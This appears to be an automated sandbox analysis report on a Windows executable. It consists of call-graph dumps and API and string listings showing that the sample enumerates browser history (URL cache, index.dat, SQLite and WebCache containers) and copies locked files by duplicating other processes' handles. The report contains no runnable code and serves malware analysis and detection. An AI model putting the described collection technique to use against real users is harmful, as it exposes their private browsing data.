43aae5 40143->40158 40144 43ac18 40147 43ac47 40144->40147 40320 42bbd5 memcpy memcpy memcpy memset memcpy 40144->40320 40148 43aca8 40147->40148 40321 438eed 16 API calls 40147->40321 40152 43acd5 40148->40152 40323 4233ae 11 API calls 40148->40323 40151 43ac87 40322 4233c5 16 API calls 40151->40322 40324 423426 11 API calls 40152->40324 40156 43ace1 40325 439811 163 API calls 40156->40325 40157 43a9f6 161 API calls 40157->40158 40158->40134 40158->40144 40158->40157 40319 439bbb 22 API calls 40158->40319 40160 43acfd 40165 43ad2c 40160->40165 40326 438eed 16 API calls 40160->40326 40162 43ad19 40327 4233c5 16 API calls 40162->40327 40164 43ad58 40328 44081d 163 API calls 40164->40328 40165->40164 40168 43add9 40165->40168 40332 423426 11 API calls 40168->40332 40169 43ae3a memset 40170 43ae73 40169->40170 40333 42e1c0 147 API calls 40170->40333 40171 43adab 40330 438c4e 163 API calls 40171->40330 40172 43ad6c 40172->40134 40172->40171 40329 42370b memset memcpy memset 40172->40329 40176 43adcc 40331 440f84 12 API calls 40176->40331 40177 43ae96 40334 42e1c0 147 API calls 40177->40334 40180 43aea8 40181 43aec1 40180->40181 40335 42e199 147 API calls 40180->40335 40183 43af00 40181->40183 40336 42e1c0 147 API calls 40181->40336 40183->40134 40186 43af1a 40183->40186 40187 43b3d9 40183->40187 40337 438eed 16 API calls 40186->40337 40192 43b3f6 40187->40192 40198 43b4c8 40187->40198 40188 43b60f 40188->40134 40396 4393a5 17 API calls 40188->40396 40191 43af2f 40338 4233c5 16 API calls 40191->40338 40378 432878 12 API calls 40192->40378 40194 43af51 40339 423426 11 API calls 40194->40339 40196 43af7d 40340 423426 11 API calls 40196->40340 40197 43b4f2 40385 43a76c 21 API calls 40197->40385 40198->40197 40384 42bbd5 memcpy memcpy memcpy memset memcpy 40198->40384 40203 43b462 40380 423330 11 API calls 40203->40380 40204 43af94 40341 423330 11 API calls 40204->40341 40205 43b529 40386 44081d 163 API calls 40205->40386 40209 43b544 40213 43b55c 40209->40213 40387 42c02e 
memset 40209->40387 40210 43b428 40210->40203 40379 432b60 16 API calls 40210->40379 40211 43afca 40342 423330 11 API calls 40211->40342 40212 43b47e 40215 43b497 40212->40215 40381 42374a memcpy memset memcpy memcpy memcpy 40212->40381 40388 43a87a 163 API calls 40213->40388 40382 4233ae 11 API calls 40215->40382 40218 43afdb 40343 4233ae 11 API calls 40218->40343 40221 43b4b1 40383 423399 11 API calls 40221->40383 40223 43b56c 40233 43b58a 40223->40233 40389 423330 11 API calls 40223->40389 40225 43afee 40344 44081d 163 API calls 40225->40344 40230 43b592 40391 43a82f 16 API calls 40230->40391 40390 440f84 12 API calls 40233->40390 40234 43b4c1 40392 42db80 163 API calls 40234->40392 40235 43b5b4 40393 438c4e 163 API calls 40235->40393 40237 43b5cf 40394 42c02e memset 40237->40394 40238 43b005 40238->40134 40244 43b01f 40238->40244 40345 42d836 163 API calls 40238->40345 40240 43b1ef 40355 4233c5 16 API calls 40240->40355 40242 43b212 40356 423330 11 API calls 40242->40356 40244->40240 40353 423330 11 API calls 40244->40353 40354 42d71d 163 API calls 40244->40354 40246 43b087 40346 4233ae 11 API calls 40246->40346 40247 43add4 40247->40188 40395 438f86 16 API calls 40247->40395 40250 43b22a 40357 42ccb5 11 API calls 40250->40357 40253 43b23f 40358 4233ae 11 API calls 40253->40358 40254 43b10f 40349 423330 11 API calls 40254->40349 40256 43b257 40359 4233ae 11 API calls 40256->40359 40260 43b129 40350 4233ae 11 API calls 40260->40350 40261 43b26e 40360 4233ae 11 API calls 40261->40360 40262 43b09a 40262->40254 40347 42cc15 19 API calls 40262->40347 40348 4233ae 11 API calls 40262->40348 40266 43b282 40361 43a87a 163 API calls 40266->40361 40267 43b13c 40351 440f84 12 API calls 40267->40351 40269 43b29d 40362 423330 11 API calls 40269->40362 40272 43b15f 40352 4233ae 11 API calls 40272->40352 40273 43b2af 40275 43b2b8 40273->40275 40276 43b2ce 40273->40276 40363 4233ae 11 API calls 40275->40363 40364 440f84 12 API calls 40276->40364 40279 43b2c9 40366 4233ae 11 API 
calls 40279->40366 40280 43b2da 40365 42370b memset memcpy memset 40280->40365 40283 43b2f9 40367 423330 11 API calls 40283->40367 40285 43b30b 40368 423330 11 API calls 40285->40368 40287 43b325 40369 423399 11 API calls 40287->40369 40289 43b332 40370 4233ae 11 API calls 40289->40370 40291 43b354 40371 423399 11 API calls 40291->40371 40293 43b364 40372 43a82f 16 API calls 40293->40372 40295 43b370 40373 42db80 163 API calls 40295->40373 40297 43b380 40374 438c4e 163 API calls 40297->40374 40299 43b39e 40375 423399 11 API calls 40299->40375 40301 43b3ae 40376 43a76c 21 API calls 40301->40376 40303 43b3c3 40377 423399 11 API calls 40303->40377 40305->40126 40306->40129 40307->40128 40309 43a6f5 40308->40309 40315 43a765 40308->40315 40309->40315 40397 42a115 40309->40397 40313 43a73d 40314 42a115 147 API calls 40313->40314 40313->40315 40314->40315 40315->40134 40317 4397fd memset 40315->40317 40316->40136 40317->40143 40318->40134 40319->40158 40320->40147 40321->40151 40322->40148 40323->40152 40324->40156 40325->40160 40326->40162 40327->40165 40328->40172 40329->40171 40330->40176 40331->40247 40332->40169 40333->40177 40334->40180 40335->40181 40336->40181 40337->40191 40338->40194 40339->40196 40340->40204 40341->40211 40342->40218 40343->40225 40344->40238 40345->40246 40346->40262 40347->40262 40348->40262 40349->40260 40350->40267 40351->40272 40352->40244 40353->40244 40354->40244 40355->40242 40356->40250 40357->40253 40358->40256 40359->40261 40360->40266 40361->40269 40362->40273 40363->40279 40364->40280 40365->40279 40366->40283 40367->40285 40368->40287 40369->40289 40370->40291 40371->40293 40372->40295 40373->40297 40374->40299 40375->40301 40376->40303 40377->40247 40378->40210 40379->40203 40380->40212 40381->40215 40382->40221 40383->40234 40384->40197 40385->40205 40386->40209 40387->40213 40388->40223 40389->40233 40390->40230 40391->40234 40392->40235 40393->40237 40394->40247 40395->40188 40396->40134 40398 42a175 40397->40398 40400 42a122 
40397->40400 40398->40315 40403 42b13b 147 API calls 40398->40403 40400->40398 40401 42a115 147 API calls 40400->40401 40404 43a174 40400->40404 40428 42a0a8 147 API calls 40400->40428 40401->40400 40403->40313 40416 43a196 40404->40416 40418 43a19e 40404->40418 40405 43a306 40405->40416 40441 4388c4 14 API calls 40405->40441 40408 415a91 memset 40408->40418 40409 43a642 40409->40416 40445 4169a7 11 API calls 40409->40445 40411 4165ff 11 API calls 40411->40418 40414 43a635 40444 42c02e memset 40414->40444 40416->40400 40418->40405 40418->40408 40418->40411 40418->40416 40419 42a115 147 API calls 40418->40419 40429 42ff8c 40418->40429 40437 439504 13 API calls 40418->40437 40438 4312d0 147 API calls 40418->40438 40439 42be4c memcpy memcpy memcpy memset memcpy 40418->40439 40440 43a121 11 API calls 40418->40440 40419->40418 40421 4169a7 11 API calls 40422 43a325 40421->40422 40422->40409 40422->40414 40422->40416 40422->40421 40423 42b5b5 memset memcpy 40422->40423 40424 42bf4c 14 API calls 40422->40424 40426 4165ff 11 API calls 40422->40426 40442 42b63e 14 API calls 40422->40442 40443 42bfcf memcpy 40422->40443 40423->40422 40424->40422 40426->40422 40428->40400 40430 43817e 139 API calls 40429->40430 40431 42ff99 40430->40431 40432 42ffe3 40431->40432 40433 42ffd0 40431->40433 40436 42ff9d 40431->40436 40447 4169a7 11 API calls 40432->40447 40446 4169a7 11 API calls 40433->40446 40436->40418 40437->40418 40438->40418 40439->40418 40440->40418 40441->40422 40442->40422 40443->40422 40444->40409 40445->40416 40446->40436 40447->40436 40448 441819 40451 430737 40448->40451 40450 441825 40452 430756 40451->40452 40464 43076d 40451->40464 40453 430774 40452->40453 40454 43075f 40452->40454 40456 43034a memcpy 40453->40456 40472 4169a7 11 API calls 40454->40472 40459 43077e 40456->40459 40457 4307ce 40458 430819 memset 40457->40458 40465 415b2c 40457->40465 40458->40464 40459->40457 40462 4307fa 40459->40462 40459->40464 40461 4307e9 40461->40458 40461->40464 40473 
4169a7 11 API calls 40462->40473 40464->40450 40466 415b42 40465->40466 40470 415b46 40465->40470 40467 415b94 40466->40467 40468 415b5a 40466->40468 40466->40470 40469 4438b5 10 API calls 40467->40469 40468->40470 40471 415b79 memcpy 40468->40471 40469->40470 40470->40461 40471->40470 40472->40464 40473->40464 40474 41493c EnumResourceNamesW

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                    • API String ID: 3073804840-2252543386
                                                                                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 585 4093b1 573->585 586 4094ff-40950b call 443d90 573->586 580 40937b-40937e call 424f26 574->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 574->581 580->573 581->580 609 409297-409299 581->609 589 4093d3-4093dd call 4251c4 585->589 586->567 595 40950d-409511 586->595 597 4093b3-4093cc call 4253cf * 2 589->597 598 4093df 589->598 595->567 600 409513-40951d call 408f2f 595->600 597->589 614 4093ce-4093d1 597->614 601 4094f7-4094fa call 424f26 598->601 600->567 601->586 609->580 611 40929f-4092a3 609->611 611->580 613 4092a9-4092ba 611->613 615 4092bc 613->615 616 4092be-4092e3 memcpy memcmp 613->616 614->589 617 4093e4-4093fb call 4253af * 2 614->617 615->616 619 409333-409345 memcmp 616->619 620 4092e5-4092ec 616->620 617->601 627 409401-409403 617->627 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                    • API String ID: 327780389-2689659898
                                                                                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 728 40e1e8-40e1fa call 406e8f 726->728 733 40e270-40e27d call 406b53 728->733 734 40e1fc-40e219 call 40dd50 * 2 728->734 733->728 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 741 40e291-40e294 call 40aa04 739->741 742 40e288-40e290 ??3@YAXPAX@Z 739->742 741->727 742->741 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                    • API String ID: 3883404497-2982631422
                                                                                                                                                                    • Opcode ID: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                    • Opcode Fuzzy Hash: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                    • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                    • API String ID: 3030842498-1896041820
                                                                                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
